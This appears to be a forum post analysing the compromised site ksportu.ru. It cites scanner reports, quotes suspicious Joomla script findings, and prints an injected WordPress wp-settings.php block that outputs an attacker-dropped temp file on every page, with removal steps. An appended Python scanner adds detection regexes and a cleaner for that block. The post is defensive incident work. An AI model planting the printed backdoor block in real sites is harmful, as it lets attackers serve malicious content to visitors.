See what is out there on that IP: http://urlquery.net/report.php?id=8903294 → http://urlquery.net/report.php?id=5023285
with a "Detected a Dynamic DNS URL" IDS alert. Domain classification: ksportu dot ru, 78.108.88.84, ns2.majordomo dot ru, Parked/expired,
see: https://www.virustotal.com/nl/url/8bbea2327a3d96dc7720168a6005a38ab872919232a49c9365d8d90c85586e24/analysis/
site is being blocked by Bitdefender’s TrafficLight but not by avast!
Flagged as blacklisted and likely compromised here: http://sitecheck.sucuri.net/results/ksportu.ru/ → http://www.siteadvisor.com/sites/ksportu.ru
Potentially suspicious files as found by Quttera:
/components/com_comprofiler/js/overlib_hideform_mini.js
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
Details: Procedure: + has been called with a string containing hidden JavaScript code.
Threat dump: View code here: http://jsunpack.jeek.org/?report=87e9e6c89e92a08dcaf00f399f8fc43f4997f90e
File size[byte]: 3352
File type: ASCII
MD5: F31A5B79F46C88B5243605814F0AAC7A
Scan duration[sec]: 0.068000
and /modules/mod_swmenufree/transmenu_Packed.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method write __tmpvar1843205897 = write;
Threat dump: View code here: http://jsunpack.jeek.org/?report=8c8be93443db3d069f89ceb1223a0302baacf12c **
File size[byte]: 11232
File type: ASCII
MD5: 34743AB7C9C049DB07EE7E518F0475A9
Scan duration[sec]: 0.114000
See: ksportu dot ru/modules/swmenufree/Packed.js benign
[nothing detected] (script) ksportu dot ru/modules/swmenufree/Packed.js
status: (referer=ksportu dot ru/)saved 11232 bytes 949cb58326fcf37450aeb699769bbe5cb57e24c4
info: [decodingLevel=0] found JavaScript
info: DecodedIframe detected
info: [img] ksportu.ru/modules/swmenufree/
info: [iframe] ksportu.ru/modules/swmenufree/javascript:false;
info: [decodingLevel=1] found JavaScript
suspicious:
** Site could be vulnerable to the wp-settings.php file modification. Identify the full block of code, as shown below, and remove it:
function check_wordpress(){
    // injected block: reads an attacker-dropped file from the system temp dir
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . '/wp_inc')){
        readfile($t_d . '/wp_inc');
    }
}
// hooks the function into every page head
add_action('wp_head', 'check_wordpress');
do_action( 'init' );
Now, save the file and upload it back to your server, overwriting the version that is already there. This will have removed the malware/malicious script from your WordPress blog. Credits for the removal routine and code go to Stop Badware link poster Steve Charlbury!
Also, the module was open to bug abuse: https://www.joomlapolis.com/forum/43-bugs/42314-swmenupro-users-watch-out-confirmed-bug
link credits: ffaabbss
polonus
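Added example (not part of polonus's post, nor code from Quttera, jsunpack or Stop Badware): a small Python scanner that turns the two indicators quoted above into signatures, the injected `check_wordpress` / `wp_inc` block in wp-settings.php and the `__tmpvarNNN = write` aliasing flagged in the packed menu script. The sample inputs are constructed fragments, not files recovered from the site. `clean_php` removes the injected function and its `add_action` hook only; it leaves `do_action( 'init' )` in place, because a stock wp-settings.php contains that call as well and the operator should decide about that line by hand.

```python
import re

# Constructed sample of a wp-settings.php fragment carrying the injected block
# quoted in the post (assumption: not a file recovered from ksportu.ru).
SAMPLE_WP_SETTINGS = """<?php
require( ABSPATH . WPINC . '/load.php' );
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');
do_action( 'init' );
"""

# Constructed sample reproducing the function-pointer aliasing Quttera flagged
# in transmenu_Packed.js (the alias name is the one quoted in the post).
SAMPLE_JS = "var __tmpvar1843205897 = write; __tmpvar1843205897('<div id=\"m\">');"

# Indicator 1: the injected function itself. DOTALL + non-greedy stops at the
# first '}' followed only by whitespace and a second '}' (end of the if block
# and of the function).
WP_INC_FUNC_RE = re.compile(
    r"function\s+check_wordpress\s*\(\s*\)\s*\{.*?\}\s*\}", re.DOTALL
)
# Indicator 2: the hook that makes WordPress call it on every page head.
WP_HEAD_HOOK_RE = re.compile(
    r"add_action\(\s*['\"]wp_head['\"]\s*,\s*['\"]check_wordpress['\"]\s*\)\s*;?[ \t]*\n?"
)
# Indicator 3 (generic): reading a dropper file from the system temp dir,
# whatever function name the injection uses.
TMP_READFILE_RE = re.compile(r"readfile\s*\(\s*\$\w+\s*\.\s*['\"]/wp_inc['\"]\s*\)")
# Indicator 4: aliasing document.write into a throwaway variable, the pattern
# Quttera reported for the packed menu script.
JS_WRITE_ALIAS_RE = re.compile(r"\b(__tmpvar\d+)\s*=\s*write\b")


def _line_of(source, offset):
    """1-based line number of a character offset in source."""
    return source.count("\n", 0, offset) + 1


def scan_php(source):
    """Return (indicator, line) pairs for every signature hit in PHP source."""
    findings = []
    for name, rx in (("wp_inc_backdoor", WP_INC_FUNC_RE),
                     ("wp_head_hook", WP_HEAD_HOOK_RE),
                     ("tmpdir_readfile", TMP_READFILE_RE)):
        for m in rx.finditer(source):
            findings.append((name, _line_of(source, m.start())))
    return findings


def clean_php(source):
    """Strip the injected function and its add_action hook; return (cleaned, count).

    do_action( 'init' ) is deliberately left untouched: a stock wp-settings.php
    contains that call too, so a human should review that line.
    """
    cleaned, n_func = WP_INC_FUNC_RE.subn("", source)
    cleaned, n_hook = WP_HEAD_HOOK_RE.subn("", cleaned)
    # collapse the blank lines the removal leaves behind
    cleaned = re.sub(r"\n{3,}", "\n\n", cleaned)
    return cleaned, n_func + n_hook


def scan_js(source):
    """Return the names of variables that alias `write` in JS source."""
    return [m.group(1) for m in JS_WRITE_ALIAS_RE.finditer(source)]


if __name__ == "__main__":
    for name, line in scan_php(SAMPLE_WP_SETTINGS):
        print(f"{name} at line {line}")
    cleaned, removed = clean_php(SAMPLE_WP_SETTINGS)
    print(f"removed {removed} block(s):\n{cleaned}")
    print("write aliases:", scan_js(SAMPLE_JS))
```

Run it against a copy of the site's wp-settings.php and the packed menu script; the line numbers it prints are where to look before overwriting anything on the server.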